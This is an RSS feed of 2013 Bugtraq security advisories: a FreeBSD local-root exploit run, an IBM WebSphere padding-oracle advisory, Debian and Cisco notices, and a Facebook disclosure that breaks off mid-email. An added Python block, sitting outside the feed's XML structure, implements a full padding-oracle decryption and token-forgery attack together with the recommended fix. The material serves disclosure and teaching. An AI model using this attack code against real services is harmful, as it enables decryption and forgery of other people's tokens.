<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/">
  <channel rdf:about="http://blog.gmane.org/gmane.comp.security.bugtraq">
    <title>gmane.comp.security.bugtraq</title>
    <link>http://blog.gmane.org/gmane.comp.security.bugtraq</link>
    <description/>
    <syn:updatePeriod>hourly</syn:updatePeriod>
    <syn:updateFrequency>1</syn:updateFrequency>
    <syn:updateBase>1901-01-01T00:00+00:00</syn:updateBase>
    <items>
      <rdf:Seq>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/52007"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/52006"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/52005"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/52004"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/52003"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/52002"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/52001"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/52000"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51999"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51998"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51997"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51996"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51995"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51994"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51989"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51983"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51982"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51981"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51980"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/51977"/>
      </rdf:Seq>
    </items>
    <image rdf:resource="http://gmane.org/img/gmane-25t.png"/>
    <textinput rdf:resource=""/>
  </channel>
  <image rdf:about="http://gmane.org/img/gmane-25t.png">
    <title>Gmane</title>
    <url>http://gmane.org/img/gmane-25t.png</url>
    <link>http://gmane.org</link>
  </image>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/52007">
    <title>Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/52007</link>
    <description>&lt;pre&gt;$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
root&amp;lt; at &amp;gt;farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger &amp;lt;fbsd9lul&amp;lt; at &amp;gt;hunger.hu&amp;gt;
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
&lt;/pre&gt;</description>
    <dc:creator>Hunger</dc:creator>
    <dc:date>2013-06-19T21:32:59</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/52006">
    <title>[CVE-2013-0523] IBM WebSphere Commerce: Encrypted URL Parameter Vulnerable to Padding Oracle Attacks</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/52006</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                         VSR Security Advisory
                       http://www.vsecurity.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: Encrypted URL Parameter Vulnerable to Padding Oracle Attacks
 Release Date: 2013-06-19
  Application: IBM WebSphere Commerce
     Versions: 5.6.X, 6.0.X, 7.0.X, possibly others
       Credit: Timothy D. Morgan &amp;lt;tmorgan (a) vsecurity . com&amp;gt;
               George D. Gal &amp;lt;ggal (a) vsecurity . com&amp;gt;
Vendor Status: Patch Available by Request [5]
CVE Candidate: CVE-2013-0523
    Reference: http://www.vsecurity.com/resources/advisory/20130619-1/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-----------------~
From [1]:

"E-commerce is no longer simply about selling online, it's about delivering a
 consistent shopping experience across all customer touchpoints, including
 mobile, social and in-store. WebSphere Commerce allows you to deliver a
 seamless, cross-channel shopping experience through contextually relevant
 content, marketing and promotions, while extending your brand across all
 digital and physical customer touchpoints."


Vulnerability Overview
~--------------------~
In February 2013, VSR identified a vulnerability in the IBM WebSphere Commerce
framework which could allow an attacker to tamper with values stored in the
"krypto" URL parameter.  This parameter is encrypted with a block cipher without
any independent integrity protection.  This, combined with observed application
behavior, allows for padding oracle attacks which can be used to decrypt the
krypto token and forge new tokens with arbitrary embedded parameters.

Additionally, in various deployment scenarios these tokens are commonly sent to
third-party sites such as IBM Coremetrics, but may also be indirectly leaked to
third-party e-commerce partners or content acceleration providers such as Akamai
Edgesuite, etc.  Sensitive data, including user passwords and personally
identifiable information could be compromised in this process.  In addition,
modification of token plaintext could allow for a variety of
application-specific attacks, including injections and/or authorization
bypasses.


Product Background
~----------------~
IBM WebSphere Commerce is an extensive e-commerce framework implemented as a
J2EE application.  The framework passes some state information related to user
sessions inside a "krypto" URL parameter.  This parameter is encrypted using
triple-DES in CBC mode.  The plaintext of this encrypted token contains a set
of name-value pairs which are formatted as URL parameters.  The values stored
in this token can be configured by developers and administrators, meaning
this will likely vary from one deployment to another.  More information on
this parameter can be found in [2].


Vulnerability Details
~-------------------~
During preliminary analysis of krypto token values, VSR first collected several
samples of tokens from different pages in a given application and then used the
Bletchley tool set [3] to analyze the tokens in a black box manner.  The
following is a partial transcript of using bletchley-analyze:

tmorgan&amp;lt; at &amp;gt;mallory:/tmp$ cat krypto-samples.txt
I6fnyg3itBEDqqEXA4iVh6pWX%2F1sV8cK%2F5EnIc4o7CO97FsqvYek69S6AeVC3AUNz1gPfhyFrOKW%0AOPRmUET6%2FI%2F9PmU8n3uqnVrCtwYc4mfA8H6P40AejGHeSc4i0JpQM%2B8iSOj8G9Yp09q%2BeuIiqbuT%0Af2zPnMoCn%2FnePOgwdxm1RwOxV0sr%2Btt98dq2dvliMgCeSGUh5NN5mlMTzabDjPz8MyevH%2BN4kv1h%0AAb%2FrasI8FYHpUwQvk%2BwXz56ORc4WvHLjZOChYTg2xmkiz9c1cHRizvcRTSiAZhtYr2bJlm0%3D
I6fnyg3itBEDqqEXA4iVh8EA%2BplSfftJ%2FiI7fedFhotK2UQO6R5GrtcU%2FTBgrikkzJnc4aGbRJBJ%0ACYhQPdJ30jywWbF7bhagi7sCp7gY3AYGmKguu4T9WZFOGQInC1SZZ7Bd5te42htqd2zwvGK4JwML%0AGPAFpvkRiVJ942TZjY7oiOMoPLn6m11fh%2BzJ6EIf5rJA4OLEs%2FvCyOGYAf%2BIsK1lZos6lhRm
CQ2t4AN6010sy2%2F%2Bu9qQNHX8Qp6yRJFze5o6la5k7qfUjXL%2BY8lWvGx5%2BdZKVmwU4N%2F020srhSN1%0A%2BLboqUj7qWg0DssiH1MZO1ZNxZ0lnrlXc7%2B6jfUOlSnoPiNKVwPaig%2FmKyU376c%3D
CQ2t4AN6010sy2%2F%2Bu9qQNHX8Qp6yRJFze5o6la5k7qeHDyGuXbwAJYvXlwM7yoEnWLXpyh%2BKP2qY%0AoCW66GPT4T1OCLehYCwMyvICI2PQ%2FgoVt81WF29eINhC0QwIbg5p

tmorgan&amp;lt; at &amp;gt;mallory:/tmp$ bletchley-analyze krypto-samples.txt
...
Beginning analysis after decoding by chain:
percent/upper-plus,base64/rfc3548-newline
Unique Lengths: 96,104,168,224
Maximum Possible Block Size: 8
Matching Common Block Sizes: 8
Possible Encodings:
Best Encoding: None
First 4 Values:
0000: 23a7e7ca0de2b411 03aaa11703889587 aa565ffd6c57c70a ff912721ce28ec23 |
"#\xa7\xe7\xca\r\xe2\xb4\x11\x03\xaa\xa1\x17\x03\x88\x95\x87\xaaV_\xfdlW\xc7\n\xff\x91'!\xce(\xec#"
0040: bdec5b2abd87a4eb d4ba01e542dc050d cf580f7e1c85ace2 9638f4665044fafc |
'\xbd\xec[*\xbd\x87\xa4\xeb\xd4\xba\x01\xe5B\xdc\x05\r\xcfX\x0f~\x1c\x85\xac\xe2\x968\xf4fPD\xfa\xfc'
0080: 8ffd3e653c9f7baa 9d5ac2b7061ce267 c0f07e8fe3401e8c 61de49ce22d09a50 |
'\x8f\xfd&amp;gt;e&amp;lt;\x9f{\xaa\x9dZ\xc2\xb7\x06\x1c\xe2g\xc0\xf0~\x8f\xe3@\x1e\x8ca\xdeI\xce"\xd0\x9aP'
00C0: 33ef2248e8fc1bd6 29d3dabe7ae222a9 bb937f6ccf9cca02 9ff9de3ce8307719 |
'3\xef"H\xe8\xfc\x1b\xd6)\xd3\xda\xbez\xe2"\xa9\xbb\x93\x7fl\xcf\x9c\xca\x02\x9f\xf9\xde&amp;lt;\xe80w\x19'
0100: b54703b1574b2bfa db7df1dab676f962 32009e486521e4d3 799a5313cda6c38c |
'\xb5G\x03\xb1WK+\xfa\xdb}\xf1\xda\xb6v\xf9b2\x00\x9eHe!\xe4\xd3y\x9aS\x13\xcd\xa6\xc3\x8c'
0140: fcfc3327af1fe378 92fd6101bfeb6ac2 3c1581e953042f93 ec17cf9e8e45ce16 |
"\xfc\xfc3'\xaf\x1f\xe3x\x92\xfda\x01\xbf\xebj\xc2&amp;lt;\x15\x81\xe9S\x04/\x93\xec\x17\xcf\x9e\x8eE\xce\x16"
0180: bc72e364e0a16138 36c66922cfd73570 7462cef7114d2880 661b58af66c9966d |
'\xbcr\xe3d\xe0\xa1a86\xc6i"\xcf\xd75ptb\xce\xf7\x11M(\x80f\x1bX\xaff\xc9\x96m'

0000: 23a7e7ca0de2b411 03aaa11703889587 c100fa99527dfb49 fe223b7de745868b |
'#\xa7\xe7\xca\r\xe2\xb4\x11\x03\xaa\xa1\x17\x03\x88\x95\x87\xc1\x00\xfa\x99R}\xfbI\xfe";}\xe7E\x86\x8b'
0040: 4ad9440ee91e46ae d714fd3060ae2924 cc99dce1a19b4490 490988503dd277d2 |
'J\xd9D\x0e\xe9\x1eF\xae\xd7\x14\xfd0`\xae)$\xcc\x99\xdc\xe1\xa1\x9bD\x90I\t\x88P=\xd2w\xd2'
0080: 3cb059b17b6e16a0 8bbb02a7b818dc06 0698a82ebb84fd59 914e1902270b5499 |
"&amp;lt;\xb0Y\xb1{n\x16\xa0\x8b\xbb\x02\xa7\xb8\x18\xdc\x06\x06\x98\xa8.\xbb\x84\xfdY\x91N\x19\x02'\x0bT\x99"
00C0: 67b05de6d7b8da1b 6a776cf0bc62b827 030b18f005a6f911 89527de364d98d8e |
"g\xb0]\xe6\xd7\xb8\xda\x1bjwl\xf0\xbcb\xb8'\x03\x0b\x18\xf0\x05\xa6\xf9\x11\x89R}\xe3d\xd9\x8d\x8e"
0100: e888e3283cb9fa9b 5d5f87ecc9e8421f e6b240e0e2c4b3fb c2c8e19801ff88b0 |
'\xe8\x88\xe3(&amp;lt;\xb9\xfa\x9b]_\x87\xec\xc9\xe8B\x1f\xe6\xb2@\xe0\xe2\xc4\xb3\xfb\xc2\xc8\xe1\x98\x01\xff\x88\xb0'
0140: ad65668b3a961466                                                    |
'\xadef\x8b:\x96\x14f'

0000: 090dade0037ad35d 2ccb6ffebbda9034 75fc429eb2449173 7b9a3a95ae64eea7 |
'\t\r\xad\xe0\x03z\xd3],\xcbo\xfe\xbb\xda\x904u\xfcB\x9e\xb2D\x91s{\x9a:\x95\xaed\xee\xa7'
0040: d48d72fe63c956bc 6c79f9d64a566c14 e0dff4db4b2b8523 75f8b6e8a948fba9 |
'\xd4\x8dr\xfec\xc9V\xbcly\xf9\xd6JVl\x14\xe0\xdf\xf4\xdbK+\x85#u\xf8\xb6\xe8\xa9H\xfb\xa9'
0080: 68340ecb221f5319 3b564dc59d259eb9 5773bfba8df50e95 29e83e234a5703da |
'h4\x0e\xcb"\x1fS\x19;VM\xc5\x9d%\x9e\xb9Ws\xbf\xba\x8d\xf5\x0e\x95)\xe8&amp;gt;#JW\x03\xda'
00C0: 8a0fe62b2537efa7                                                    |
'\x8a\x0f\xe6+%7\xef\xa7'

0000: 090dade0037ad35d 2ccb6ffebbda9034 75fc429eb2449173 7b9a3a95ae64eea7 |
'\t\r\xad\xe0\x03z\xd3],\xcbo\xfe\xbb\xda\x904u\xfcB\x9e\xb2D\x91s{\x9a:\x95\xaed\xee\xa7'
0040: 870f21ae5dbc0025 8bd797033bca8127 58b5e9ca1f8a3f6a 98a025bae863d3e1 |
"\x87\x0f!\xae]\xbc\x00%\x8b\xd7\x97\x03;\xca\x81'X\xb5\xe9\xca\x1f\x8a?j\x98\xa0%\xba\xe8c\xd3\xe1"
0080: 3d4e08b7a1602c0c caf2022363d0fe0a 15b7cd56176f5e20 d842d10c086e0e69 |
'=N\x08\xb7\xa1`,\x0c\xca\xf2\x02#c\xd0\xfe\n\x15\xb7\xcdV\x17o^ \xd8B\xd1\x0c\x08n\x0ei'


These 4 samples have decoded lengths which are consistent with a 64-bit
(8 byte) block cipher (such as DES, 3DES, or blowfish).  In addition, the
first two samples share the first two blocks in common (but no others),
while the third and fourth samples have the first four blocks in common.
This pattern is a sign that the ciphertext may be encrypted using CBC mode
with a static IV, which is a very common implementation mistake.  Use of
a static IV can allow for information leaks, and while it is typically not
a critical flaw in this context, it does provide an indication that CBC
mode encryption may be in use.

From there, IBM fix packs were obtained for WebSphere Commerce and the relevant
classes were decompiled.  Analysis of the decryption process revealed that the
received krypto token is first base64 decoded, then decrypted, and finally
decoded from UTF-8 (all prior to interpretation as a set of name-value pairs).
In most cases, if an error occurs during these first few steps, the decryption
routine returns a null value, which is interpreted by the application as if the
krypto parameter were never provided by the user.  However, if execution
arrives at the UTF-8 decoding step and an error occurs in the interpretation
of UTF-8 code points, the method uses System.exit() to end the process.
In practice, this exit condition causes the server to return an HTTP response
with a zero-length body.  This difference in behavior can be utilized to
create a "padding oracle", which allows one to determine if a given
ciphertext's padding (after decryption) is correct.  Given that the
encryption mode is CBC, this makes the application vulnerable to padding
oracle attacks which are discussed further in [4].  (Note that this is not
the only way in which a padding oracle can be constructed based on
application behavior, but merely the most reliable known method.)

A script was developed using Bletchley's POA class to validate that this flaw
exists in a real-world deployment. Encrypted tokens were successfully decrypted.
In some cases, sensitive information (including a user password) was observed
to exist in the recovered plaintext.

Note that it would also be possible to craft malicious krypto token values that
specify nearly arbitrary plaintext name/value pairs after decryption.  The
implementation of this attack would be somewhat tricky, given the static nature
of the initialization vector, but the plaintext format of the krypto tokens is
fairly forgiving, which would allow an attacker to work around this limitation.



Versions Affected
~---------------~
VSR confirmed that WebSphere Commerce versions 5.6.X and 6.X are vulnerable.
IBM indicates the following specific versions are affected:

* WebSphere Commerce versions 7.0.0.0 to 7.0.0.7
* WebSphere Commerce versions 6.0.0.0 to 6.0.0.11
* WebSphere Commerce 5.6.1.0 to 5.6.1.5
* Earlier out of support versions may be affected


Vendor Response
~-------------~
The following timeline details IBM's response to the reported issue:

2013-02-14    IBM was provided a draft security advisory with recommendations
              for remediation.

2013-02-15    IBM acknowledged receipt of advisory.

2013-02-25    IBM acknowledged the vulnerability exists.

2013-03-20    IBM obtained a CVE identifier and estimated patch availability in
              mid-June.

2013-06-04    VSR requested an update for the patch release.  IBM indicated it
              was still expected for mid-June.

2013-06-13    IBM indicated a fix would be released the following day and would
              notify VSR upon release.

2013-06-14    IBM released an advisory [5].

2013-06-15    IBM notified VSR that the advisory was made available.

2013-06-19    VSR advisory released



Technical Recommendations Provided to IBM
~---------------------------------------~
IBM should update the WebSphere Commerce implementation to add a message
authentication code (MAC) to the existing krypto token.  This MAC should be
applied to the full ciphertext of the parameter and verified before any
decryption is attempted.  In addition, the initialization vector (IV) of the
encrypted data should be randomized to prevent information leaks.  Ensure the IV
is included along with the ciphertext in the token and that the MAC is applied
to this value along with the ciphertext.  For instance, a safer implementation
might read (in pseudocode):

  iv = get_random_bytes(8)
  ciphertext = encrypt(cipher_key, iv, plaintext)
  integrity = mac(mac_key, iv + ciphertext)
  krypto = base64(iv + ciphertext + mac)

Once again, the mac should be verified prior to any decryption operation.



Recommendation for Users
~----------------------~
Apply the security update released by IBM as soon as possible.  The following
instructions are provided in [5]:

"For supported versions, open a Problem Management Record (PMR) with IBM
WebSphere Commerce Support to request an Interim Fix for APAR JR46386 and
include your WebSphere Commerce version including Fix Pack level. For out of
support versions, we recommend that you upgrade to a supported version."



Common Vulnerabilities and Exposures (CVE) Information
~----------------------------------------------------~
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2013-0523 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


References:

1.  http://www.ibm.com/software/products/us/en/websphere-commerce

2.
http://pic.dhe.ibm.com/infocenter/wchelp/v6r0m0/index.jsp?topic=%2Fcom.ibm.commerce.admin.doc%2Ftasks%2Ftdc_encryparam.htm

3.  http://code.google.com/p/bletchley/

4.  http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth

5.  http://www-01.ibm.com/support/docview.wss?uid=swg21640597


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety.  This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose.  Neither Virtual Security Research, LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible
disclosure practices:
  http://www.vsecurity.com/company/disclosure

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     Copyright 2013 Virtual Security Research, LLC.  All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
-----END PGP SIGNATURE-----

&lt;/pre&gt;</description>
    <dc:creator>VSR Advisories</dc:creator>
    <dc:date>2013-06-19T17:30:49</dc:date>
  </item>
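The VSR advisory above describes the attack and the fix in prose. What follows is an added worked example (editor's code, not from VSR, Bletchley or IBM) that runs both ends of it: a vulnerable issuer with a static IV and no MAC, the server's behaviour reduced to a one-bit padding oracle, block-by-block plaintext recovery, a forgery that has to live with an uncontrolled first block, and the encrypt-then-MAC token layout the advisory recommends. Because the attack depends only on CBC mode and PKCS#5 padding, an 8-byte Feistel network built on HMAC-SHA256 stands in for 3DES; the keys, the fixed IV value, the token layout and the oracle function are assumptions for the demo, and the ampersand that separates name=value pairs is spelled as the constant AMP.

```python
# Added example, not code from VSR, Bletchley or IBM: the CBC padding-oracle attack the
# advisory describes and the encrypt-then-MAC fix it recommends.  A Feistel network with
# an HMAC-SHA256 round function stands in for 3DES; keys, IV, token layout and oracle are assumed.
import hashlib, hmac, os

BLOCK, ROUNDS = 8, 8
STATIC_IV = bytes(range(BLOCK))          # assumed fixed IV, as the advisory inferred
CIPHER_KEY = b"demo-3des-stand-in-key"   # constructed demo key
MAC_KEY = b"demo-mac-key"                # constructed demo key, used only by the fix
AMP = bytes([0x26])                      # ampersand separating name=value pairs

def _xor(a, b): return bytes(x ^ y for x, y in zip(a, b))
def _blocks(data): return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def _feistel(key, block, rounds):        # 64-bit block, HMAC-SHA256 as the round PRF
    left, right = block[:4], block[4:]
    for r in rounds:
        f = hmac.new(key, bytes([r]) + right, hashlib.sha256).digest()[:4]
        left, right = right, _xor(left, f)
    return right + left                  # final swap: reversed round order inverts
def block_encrypt(key, block): return _feistel(key, block, range(ROUNDS))
def block_decrypt(key, block): return _feistel(key, block, reversed(range(ROUNDS)))

def pad(data):                           # PKCS#5, as on the 8-byte 3DES block
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if n == 0 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out = [iv]
    for p in _blocks(padded):
        out.append(block_encrypt(key, _xor(p, out[-1])))
    return b"".join(out[1:])

def cbc_decrypt(key, iv, ct):
    blocks = _blocks(ct)
    return b"".join(_xor(block_decrypt(key, c), p) for c, p in zip(blocks, [iv] + blocks))

def issue_token(plaintext): return cbc_encrypt(CIPHER_KEY, STATIC_IV, pad(plaintext))

def padding_oracle(token):
    # Advisory signal: normal page (decrypt failed) vs. empty body (pad OK, System.exit on bad UTF-8).
    try:
        return unpad(cbc_decrypt(CIPHER_KEY, STATIC_IV, token)) is not None
    except ValueError:
        return False

def recover_intermediate(oracle, block):
    # D_k(block), recovered without the key in at most 2 * 256 queries per byte.
    inter, prev = bytearray(BLOCK), bytearray(BLOCK)
    for pos in reversed(range(BLOCK)):
        pad_byte = BLOCK - pos
        for k in range(pos + 1, BLOCK):
            prev[k] = inter[k] ^ pad_byte    # steer already-known bytes to pad_byte
        for guess in range(256):
            prev[pos] = guess
            ok = oracle(bytes(prev) + block)
            if ok and pos == BLOCK - 1:      # rule out a lucky 02 02 (or longer) padding
                prev[pos - 1] ^= 0xFF
                ok = oracle(bytes(prev) + block)
                prev[pos - 1] ^= 0xFF
            if ok:
                inter[pos] = guess ^ pad_byte
                break
        else:
            raise RuntimeError("no guess produced valid padding")
    return bytes(inter)

def decrypt_token(oracle, iv, token):
    blocks = _blocks(token)
    return unpad(b"".join(_xor(recover_intermediate(oracle, c), p)
                          for c, p in zip(blocks, [iv] + blocks)))

def forge_token(oracle, iv, tail):
    # Blocks are derived backwards from a random last block, so the first plaintext
    # block is uncontrolled junk a forgiving parser must drop.  Returns (token, junk).
    chain = [os.urandom(BLOCK)]
    for p in reversed(_blocks(pad(tail))):
        chain.insert(0, _xor(recover_intermediate(oracle, chain[0]), p))
    return b"".join(chain), _xor(recover_intermediate(oracle, chain[0]), iv)

# Recommended design: random IV, MAC over iv + ciphertext, verified before decryption.
def issue_token_fixed(plaintext):
    iv = os.urandom(BLOCK)
    ct = cbc_encrypt(CIPHER_KEY, iv, pad(plaintext))
    return iv + ct + hmac.new(MAC_KEY, iv + ct, hashlib.sha256).digest()

def open_token_fixed(token):
    # None for anything we did not issue; constant-time tag check, so no padding signal.
    iv, ct, tag = token[:BLOCK], token[BLOCK:-32], token[-32:]
    good = hmac.new(MAC_KEY, iv + ct, hashlib.sha256).digest()
    if not len(ct) >= BLOCK or len(ct) % BLOCK or not hmac.compare_digest(tag, good):
        return None
    return unpad(cbc_decrypt(CIPHER_KEY, iv, ct))
```

Exercising it: token = issue_token(b"storeId=10001" + AMP + b"userId=42") models a krypto value. Because the IV never changes, one known or guessed 8-byte prefix gives it for good, iv = _xor(recover_intermediate(padding_oracle, token[:8]), b"storeId="), after which decrypt_token(padding_oracle, iv, token) returns the whole plaintext with on the order of a thousand oracle queries per block. Two tokens built from plaintexts sharing a 16-byte prefix share their first two ciphertext blocks, which is the pattern bletchley-analyze exposed above. forge_token(padding_oracle, iv, AMP + b"role=admin") yields a token whose plaintext is eight junk bytes followed by the chosen pairs; against the real application that junk block would also have to pass the UTF-8 decode step the advisory describes, one reason it calls the forgery "somewhat tricky". open_token_fixed() rejects any altered token before a single block is decrypted, which is what removes the oracle.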
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/52005">
    <title>[SECURITY] [DSA 2711-1] haproxy security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/52005</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

-------------------------------------------------------------------------
Debian Security Advisory DSA-2711-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
June 19, 2013                          http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : haproxy
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-2942 CVE-2013-1912 CVE-2013-2175

Multiple security issues have been found in HAProxy, a load-balancing 
reverse proxy:

CVE-2012-2942

    Buffer overflow in the header capture code.

CVE-2013-1912

    Buffer overflow in the HTTP keepalive code.

CVE-2013-2175

    Denial of service in parsing HTTP headers.

For the oldstable distribution (squeeze), these problems have been fixed in
version 1.4.8-1+squeeze1.

The stable distribution (wheezy) doesn't contain haproxy.

For the unstable distribution (sid), these problems have been fixed in
version 1.4.24-1.

We recommend that you upgrade your haproxy packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce&amp;lt; at &amp;gt;lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHB5iUACgkQXm3vHE4uyloejQCcDLeGSbq/TcynokkvYSZf7tgW
ykUAn2IzWLERPgLLKGWdtiazkMZ1hAJh
=fAae
-----END PGP SIGNATURE-----


&lt;/pre&gt;</description>
    <dc:creator>Moritz Muehlenhoff</dc:creator>
    <dc:date>2013-06-19T17:11:58</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/52004">
    <title>Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence TC and TE Software</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/52004</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence TC and TE Software

Advisory ID: cisco-sa-20130619-tpc

Revision 1.0

For Public Release 2013 June 19 16:00  UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Cisco TelePresence TC and TE Software contain two vulnerabilities in the implementation of the Session Initiation Protocol (SIP) that could allow an unauthenticated remote attacker to cause a denial of service (DoS) condition.

Additionally, Cisco TelePresence TC Software contains an adjacent root access vulnerability that could allow an attacker on the same physical or logical Layer-2 network as the affected system to gain an unauthenticated root shell.

Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate the Cisco TelePresence TC and TE Software SIP Denial of Service vulnerabilities are available. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130619-tpc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)

iF4EAREKAAYFAlHBtlQACgkQUddfH3/BbTpOdwEAiBS9DSSPEUee26GiAHsj2UbF
ts/iwI6PsKqrsZ8PWzsA/iY2dCpNgpMvtw7uCT6oUu6jj6DumUhebUKjh2TkotFO
=4gGi
-----END PGP SIGNATURE-----

&lt;/pre&gt;</description>
    <dc:creator>Cisco Systems Product Security Incident Response Team</dc:creator>
    <dc:date>2013-06-19T16:00:14</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/52003">
    <title>Facebook critical design flaw</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/52003</link>
    <description>&lt;pre&gt;On or around September 27, 2012 I disclosed to Facebook through https://www.facebook.com/whitehat/report/ a critical design flaw in how users share photos using a URI. Once a URI is known the only action the user can take to hide the contents of a photo album is to delete the album. This means if you ever have a breach, be it someone sitting in front of your computer, or getting your Facebook password, you must delete all your photo albums to keep the contents private. You can succumb to the fact that those photos are breached, and only place photos in new albums as well.

Please note the following:
1) I don't care about the bounty, I would just like to see this fixed. 
2) From initial disclosure to initial contact from Facebook took 13 days. Far longer than the same day fix for a previous issue I disclosed to Facebook.

Recommended fix: 

1) Provide the user a way to regenerate this URI with a link: "Expire this URI"
2) Provide (or force) it as an option when changing their password
3) When Facebook believes an account has been accessed by someone else (there's a dialog for this) provide (or force) an option to change this URI

Emails from Facebook about this:

--snip--
10/09/12

Hi Joel,

Ack - it appears the external response got dropped (we're investigating what happened there). Incredibly sorry about the delay. We're actively working on this now to confirm if this is intentional behavior.

Thanks,

Alex
Security
Facebook

--------

--snip--
10/10/12

Hey Joel,

As you expected, the investigation here indeed revealed that this was "intentional" in the sense that it has always operated this way. The URIs generated by this feature were designed to be public and permanent. Our Photos team is currently collecting additional data on the usage of this feature to determine next steps as there are a few different options available. For your reference, we're tracking this as a security enhancement rather than a high-pri bug, which means we're likely looking at a resolution time of several weeks. I'll keep you updated as the team reaches a decision on next steps.

Thanks,

Alex
Security
Facebook
--------

--snip-- 
10/29/12

Hi Joel,

